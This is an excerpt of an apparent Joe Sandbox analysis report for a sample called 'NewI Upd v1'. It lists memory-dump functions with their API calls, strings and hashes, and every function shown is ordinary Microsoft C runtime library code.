strcpy_s( result_buffer, result_buffer_count, strings[row][column + !long_string_will_fit]), xrefs: 0089DC17

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: __aligned_msize__invoke_watson_if_error_strlen
String ID: fp_format_nan_or_infinity$minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp$strcpy_s( result_buffer, result_buffer_count, strings[row][column + !long_string_will_fit])
API String ID: 2470549621-3631232711
Opcode ID: ca209ca335223127f90bb80d47922cac0564e3cdf2ba8c17b28952f887afcf47
Instruction ID: 9de5f53d08f1c3bcaf328766a4fa6786dc4f00843dd83fc0b7f7ec00c2b573ce
Opcode Fuzzy Hash: ca209ca335223127f90bb80d47922cac0564e3cdf2ba8c17b28952f887afcf47
Instruction Fuzzy Hash: 9331A8B09043899BDF10DF68C851BAF7FB1FF45304F188199E855A7381D275DA14CB95

Function 00881950 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 82COMMONLIBRARYCODE

Download Yara Rule

APIs

_strlen.LIBCMT ref: 008819BB
__aligned_msize.LIBCMTD ref: 00881A16
__crt_unique_heap_ptr.LIBCMTD ref: 00881A21

Part of subcall function 00881900: __crt_unique_heap_ptr.LIBCMTD ref: 0088190A

Strings

%ls, xrefs: 0088196E
D:\a\_work\1\s\src\vctools\crt\vcruntime\src\eh\std_exception.cpp, xrefs: 00881977
to->_What == nullptr && to->_DoFree == false, xrefs: 00881969

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: __crt_unique_heap_ptr$__aligned_msize_strlen
String ID: %ls$D:\a\_work\1\s\src\vctools\crt\vcruntime\src\eh\std_exception.cpp$to->_What == nullptr && to->_DoFree == false
API String ID: 3817959681-3183830673
Opcode ID: 7dccf255426ffda95d48492c247f8e71faf1e4db74fd454cf110208b805a250a
Instruction ID: 0e9d40f732ea5a4f05c18efa43964c4d30081605aed6e880ad5a9ebea013ec43
Opcode Fuzzy Hash: 7dccf255426ffda95d48492c247f8e71faf1e4db74fd454cf110208b805a250a
Instruction Fuzzy Hash: 3D314D74A00218AFCB04EF98C892AADBB75FF55304F54C099E919DB392DB71EA41CB91

Function 008A8790 Relevance: 9.2, APIs: 6, Instructions: 171COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a5af9c0e8b07248d55a3f493273fa39902c2aee274252d9c60d998238bcb319
Instruction ID: e9aee097a0c2defde5169a2693834f3f2798373535ab615803648bc4dbf100f1
Opcode Fuzzy Hash: 1a5af9c0e8b07248d55a3f493273fa39902c2aee274252d9c60d998238bcb319
Instruction Fuzzy Hash: 3161D171C04B08DADB16EF38D94616EBBB4FF52345F108729F888AA941EB308A95D653

Function 0089A150 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 207COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMTD ref: 0089A1CD
___free_lconv_num.LIBCMTD ref: 0089A20D

Strings

%ls, xrefs: 0089A393
minkernel\crts\ucrt\src\appcrt\locale\locale_refcounting.cpp, xrefs: 0089A39F
(ptloci->lc_category[category].locale != nullptr && ptloci->lc_category[category].refcount != nullptr) || (ptloci->lc_category[cat, xrefs: 0089A38E

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: ___free_lconv_mon___free_lconv_num
String ID: %ls$(ptloci->lc_category[category].locale != nullptr && ptloci->lc_category[category].refcount != nullptr) || (ptloci->lc_category[cat$minkernel\crts\ucrt\src\appcrt\locale\locale_refcounting.cpp
API String ID: 717313246-164516335
Opcode ID: d54e5b06dcdfafc2713a45f108d7e76521e2cdd9cd4e90dbe6ebe9df931b3392
Instruction ID: 71f1256911b1e7b75c89a2d915469d6c66c8e62e824a38b05c517085ba34d5b9
Opcode Fuzzy Hash: d54e5b06dcdfafc2713a45f108d7e76521e2cdd9cd4e90dbe6ebe9df931b3392
Instruction Fuzzy Hash: 23813E74600204EFEB18DF58C885FA93762FB44348F588168E9499F782DB75EE85DBC1

Function 008A9E20 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 105timeCOMMON

Download Yara Rule

APIs

std::_Timevec::_Timevec.LIBCPMTD ref: 008A9E2F

Part of subcall function 008A25C0: std::_Timevec::_Timevec.LIBCPMTD ref: 008A25D0

Part of subcall function 008A5450: std::_Timevec::_Timevec.LIBCPMTD ref: 008A5486

Part of subcall function 0089F0E0: std::_Timevec::_Timevec.LIBCPMTD ref: 0089F0EF

Strings

_fclose_nolock_internal, xrefs: 008A9EAA
%ls, xrefs: 008A9E64
minkernel\crts\ucrt\src\appcrt\stdio\fclose.cpp, xrefs: 008A9E6D, 008A9EA5
stream.valid(), xrefs: 008A9E5F, 008A9EAF

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: TimevecTimevec::_std::_
String ID: %ls$_fclose_nolock_internal$minkernel\crts\ucrt\src\appcrt\stdio\fclose.cpp$stream.valid()
API String ID: 4219598475-3166852756
Opcode ID: b3d0c1f48c92a8255d2104506eb9d37abecb6e81f7319a2c7390cd28afdae0c3
Instruction ID: a49bbd07ed74b0e767b63936f2fb2421bbd8b28b38cfa48c63d08a8aa6672305
Opcode Fuzzy Hash: b3d0c1f48c92a8255d2104506eb9d37abecb6e81f7319a2c7390cd28afdae0c3
Instruction Fuzzy Hash: 8A316DB0D00208EAEB14EBA8CC56BAE7764FF51314F104654F515EA6C2EB749B14CB92

Function 008A9CC0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103timeCOMMON

Download Yara Rule

APIs

std::_Timevec::_Timevec.LIBCPMTD ref: 008A9CF9

Strings

%ls, xrefs: 008A9D2E
_fclose_internal, xrefs: 008A9D74
minkernel\crts\ucrt\src\appcrt\stdio\fclose.cpp, xrefs: 008A9D37, 008A9D6F
stream.valid(), xrefs: 008A9D29, 008A9D79

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: TimevecTimevec::_std::_
String ID: %ls$_fclose_internal$minkernel\crts\ucrt\src\appcrt\stdio\fclose.cpp$stream.valid()
API String ID: 4219598475-2931739134
Opcode ID: 93140d546b48be594bdb0ca4f1e0a8fa5179042e25c14bbfb3e5d8ede309f35b
Instruction ID: c8ac75e06705d1ab15bc6594460d1bf9aebffa7d427aeeba04a7fec7072aff69
Opcode Fuzzy Hash: 93140d546b48be594bdb0ca4f1e0a8fa5179042e25c14bbfb3e5d8ede309f35b
Instruction Fuzzy Hash: 5F31A071D44308ABEB04EFA8DC42BEE77B4FB55324F204229F025E66D2DBB95904C765

Function 0089AB70 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 81COMMONLIBRARYCODE

Download Yara Rule

Strings

minkernel\crts\ucrt\src\appcrt\internal\winapi_thunks.cpp, xrefs: 0089ABFA, 0089AC4C
cached_handle == INVALID_HANDLE_VALUE, xrefs: 0089ABE9
cached_handle == new_handle, xrefs: 0089AC3B
%ls, xrefs: 0089ABEE, 0089AC40

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: %ls$cached_handle == INVALID_HANDLE_VALUE$cached_handle == new_handle$minkernel\crts\ucrt\src\appcrt\internal\winapi_thunks.cpp
API String ID: 0-442401637
Opcode ID: 1b08b44a5a120731d8fcb00517b2a231ca1223951c22acfdc57c788cd8f596d1
Instruction ID: 6087ef43b42347a3b84fbedd0a4e73c937ff364814f586989817738a7edd0125
Opcode Fuzzy Hash: 1b08b44a5a120731d8fcb00517b2a231ca1223951c22acfdc57c788cd8f596d1
Instruction Fuzzy Hash: 80219370D40219BBDF24EAA4DC8AB9D7374FB0131CF144654F515EA2C2E6749A50DA82

Function 008987A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,0088302A,?,00882D0D,?,?,?,?,?,0088320A), ref: 008987A8
std::_Timevec::_Timevec.LIBCPMTD ref: 008987B2
__wcstombs_l.LIBCMTD ref: 00898811
std::_Timevec::_Timevec.LIBCPMTD ref: 0089881D

Strings

minkernel\crts\ucrt\src\desktopcrt\env\get_environment_from_os.cpp, xrefs: 00898804

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: TimevecTimevec::_std::_$EnvironmentStrings__wcstombs_l
String ID: minkernel\crts\ucrt\src\desktopcrt\env\get_environment_from_os.cpp
API String ID: 1494238470-170101930
Opcode ID: 7716f5da16cb7b669461c1f7a9c3d52c9561717a8290f2edb854e70b933b6d11
Instruction ID: 0453c89040f5b038565bc5c184ec986e3445bcae3de4cbf4585cd9b046157f28
Opcode Fuzzy Hash: 7716f5da16cb7b669461c1f7a9c3d52c9561717a8290f2edb854e70b933b6d11
Instruction Fuzzy Hash: 9831EB71C00119EBCF18FFA8D8969EEB7B4FF54300F540168A102E6192EF35AB05CB92

Function 008A6AF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 54COMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(00000000), ref: 008A6B34
GetLastError.KERNEL32 ref: 008A6B42

Strings

("Invalid file descriptor. File possibly closed by a different thread",0), xrefs: 008A6B64
%ls, xrefs: 008A6B69
minkernel\crts\ucrt\src\appcrt\lowio\commit.cpp, xrefs: 008A6B72

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: BuffersErrorFileFlushLast
String ID: %ls$("Invalid file descriptor. File possibly closed by a different thread",0)$minkernel\crts\ucrt\src\appcrt\lowio\commit.cpp
API String ID: 1917127615-1268643607
Opcode ID: 312a7ec81b7d66b09245fd023f3196a269ec8a20d20afd139b80428cd5bf8cb1
Instruction ID: 5914149c89e4342754141a01eae9f01a365e9b38e20b822e19ca1a0358a66c19
Opcode Fuzzy Hash: 312a7ec81b7d66b09245fd023f3196a269ec8a20d20afd139b80428cd5bf8cb1
Instruction Fuzzy Hash: 28112534A00204AFDB00EFB8DC46A1D7761FB47324F2841A8F511DB3A1E635EE12CB60

Function 008811B2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0087FD50: ___vcrt_getptd.LIBVCRUNTIMED ref: 0087FD56
Part of subcall function 0087FD50: ___vcrt_getptd.LIBVCRUNTIMED ref: 0087FD6C

___vcrt_getptd.LIBVCRUNTIMED ref: 008811CF
___vcrt_getptd.LIBVCRUNTIMED ref: 008811DA
__IsExceptionObjectToBeDestroyed.LIBVCRUNTIMED ref: 00881230
___DestructExceptionObject.LIBCMTD ref: 00881255

Strings

csm, xrefs: 008811E8

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: ___vcrt_getptd$ExceptionObject$DestroyedDestruct
String ID: csm
API String ID: 485384042-1018135373
Opcode ID: ad5bf6b98acdde439386ae22eee25e0f183f6591016c5cf2e2ff964758da6738
Instruction ID: 94084295eaa3e2ffae959e2ae56ad5af02cb7e0dcdf82b146bbbd5a7a6e1cdf3
Opcode Fuzzy Hash: ad5bf6b98acdde439386ae22eee25e0f183f6591016c5cf2e2ff964758da6738
Instruction Fuzzy Hash: 0421FC74900208DFCF18EF98D0986AA7B7AFF55305F548258E419DB252DB34DA86CB92

Function 0089F0E0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49timeCOMMON

Download Yara Rule

APIs

std::_Timevec::_Timevec.LIBCPMTD ref: 0089F0EF

Strings

_fileno, xrefs: 0089F15C
%ls, xrefs: 0089F124
stream.valid(), xrefs: 0089F11F, 0089F161
minkernel\crts\ucrt\src\appcrt\stdio\fileno.cpp, xrefs: 0089F12D, 0089F157

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: TimevecTimevec::_std::_
String ID: %ls$_fileno$minkernel\crts\ucrt\src\appcrt\stdio\fileno.cpp$stream.valid()
API String ID: 4219598475-3741990651
Opcode ID: 22753c50010fc12bdbee0a0a67c2f25ad3dcace7a39710326542960e57714cbd
Instruction ID: 5d61adaac3647e409da38ab85fe3deee940968f5d1c7b705dcd437f3a6b34446
Opcode Fuzzy Hash: 22753c50010fc12bdbee0a0a67c2f25ad3dcace7a39710326542960e57714cbd
Instruction Fuzzy Hash: 4901D230E8430CFADF29BA84CC42BED7B60FB50718F244264F215E62D3C7B45A4486C6

Function 0087E680 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

___vcrt_getptd.LIBVCRUNTIMED ref: 0087E6B3
___vcrt_getptd.LIBVCRUNTIMED ref: 0087E6C7
___vcrt_getptd.LIBVCRUNTIMED ref: 0087E6D7
___vcrt_getptd.LIBVCRUNTIMED ref: 0087E6E2

Strings

csm, xrefs: 0087E6A8

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: ___vcrt_getptd
String ID: csm
API String ID: 984050374-1018135373
Opcode ID: e98f0f87cc11f5f3536577ba016a0ce25959a303e9a11200642eef1b5e6cebc9
Instruction ID: c83ce9c2c51969c4510ea54224078ae0c784dbbfa2e274c280595f17ecfe1b21
Opcode Fuzzy Hash: e98f0f87cc11f5f3536577ba016a0ce25959a303e9a11200642eef1b5e6cebc9
Instruction Fuzzy Hash: D011E278A04208EFCB04EFA8C1455ADBBB1FF58314B5089E9D819EB315D734EA80DB82

Function 0087F200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(0087F107,00000000,00000800,?,?,0087F107,00000000), ref: 0087F20F
GetLastError.KERNEL32(?,?,0087F107), ref: 0087F223
_wcsncmp.LIBCMTD ref: 0087F239
LoadLibraryExW.KERNEL32(0087F107,00000000,00000000,?,0087F107), ref: 0087F24D

Strings

api-ms-, xrefs: 0087F230

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: LibraryLoad$ErrorLast_wcsncmp
String ID: api-ms-
API String ID: 4169583555-2084034818
Opcode ID: 7f185bf5b48930967ee98ea108175b8cdc5780a85c514aef69d6f06fbe04934f
Instruction ID: 4be47afd19ee2096d9dd957a241531983d6fe1a2e00f9271c6ef4f7d2e2721e3
Opcode Fuzzy Hash: 7f185bf5b48930967ee98ea108175b8cdc5780a85c514aef69d6f06fbe04934f
Instruction Fuzzy Hash: 21F09038A50208FBEB00DBA1EC0AB697768FB45704F10C0A0FB08DB183D774EA009790

Function 008842A0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 181timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Timevec::_Timevec.LIBCPMTD ref: 00884374
std::_Timevec::_Timevec.LIBCPMTD ref: 008843BD

Strings

minkernel\crts\ucrt\src\appcrt\startup\onexit.cpp, xrefs: 00884357, 008843A0
, xrefs: 0088433F

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: TimevecTimevec::_std::_
String ID: $minkernel\crts\ucrt\src\appcrt\startup\onexit.cpp
API String ID: 4219598475-1215429239
Opcode ID: 8bda16532e983493ff7a5533a1403aa4d014535df09b2514d1d736e06222902e
Instruction ID: ab7fe5f88f2eb4fbafbbc53c8d6a43ed748fd70a983849dc8dfe20ca81af26bf
Opcode Fuzzy Hash: 8bda16532e983493ff7a5533a1403aa4d014535df09b2514d1d736e06222902e
Instruction Fuzzy Hash: 1581C5B5E002099FDB04EFA8D881AAEBBB1FF48304F208169E515BB351D735AA41CF91

Function 00897A00 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 163timeCOMMON

Download Yara Rule

APIs

Part of subcall function 008974F0: GetOEMCP.KERNEL32(00000000), ref: 00897525

__wcstombs_l.LIBCMTD ref: 00897A85
std::_Timevec::_Timevec.LIBCPMTD ref: 00897A91

Strings

minkernel\crts\ucrt\src\appcrt\mbstring\mbctype.cpp, xrefs: 00897A79

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: TimevecTimevec::___wcstombs_lstd::_
String ID: minkernel\crts\ucrt\src\appcrt\mbstring\mbctype.cpp
API String ID: 2681442900-426720447
Opcode ID: 403fb741a81373c539740331da8bfc435edd99f234f2e0286dbff9b49d58168c
Instruction ID: 85d4af48694232fa2f6b1fef2e18a8df84736b4ffa9369e2a61c30cd2faf3425
Opcode Fuzzy Hash: 403fb741a81373c539740331da8bfc435edd99f234f2e0286dbff9b49d58168c
Instruction Fuzzy Hash: 1D5163719142059BCF18EF68C882AAE77B4FF54321F144258E911EB2D6EB31ED05CBA1

Function 00883990 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57timeCOMMON

Download Yara Rule

APIs

std::_Timevec::_Timevec.LIBCPMTD ref: 008839C0
GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,00000000,4903A6BA), ref: 008839D5

Strings

mscoree.dll, xrefs: 008839CE
CorExitProcess, xrefs: 008839E9

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: HandleModuleTimevecTimevec::_std::_
String ID: CorExitProcess$mscoree.dll
API String ID: 2070146554-1276376045
Opcode ID: f75b63ed7754192ea0498c25e0ba226ca40e6600c60eea22a269d1bc2e0b6c7a
Instruction ID: 44026692283563043c33054cc9ade4e77985b79a22fd6050f5ff4bfab1f75acb
Opcode Fuzzy Hash: f75b63ed7754192ea0498c25e0ba226ca40e6600c60eea22a269d1bc2e0b6c7a
Instruction Fuzzy Hash: 40113A7091451ADBCB14FFA8CC46AAEB7B8FF14B10F000529A526E3691EB34AA058B91

Function 008A5450 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55timeCOMMON

Download Yara Rule

APIs

std::_Timevec::_Timevec.LIBCPMTD ref: 008A5486

Strings

public_stream != nullptr, xrefs: 008A545C
minkernel\crts\ucrt\src\appcrt\stdio\_freebuf.cpp, xrefs: 008A546A
%ls, xrefs: 008A5461

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: TimevecTimevec::_std::_
String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_freebuf.cpp$public_stream != nullptr
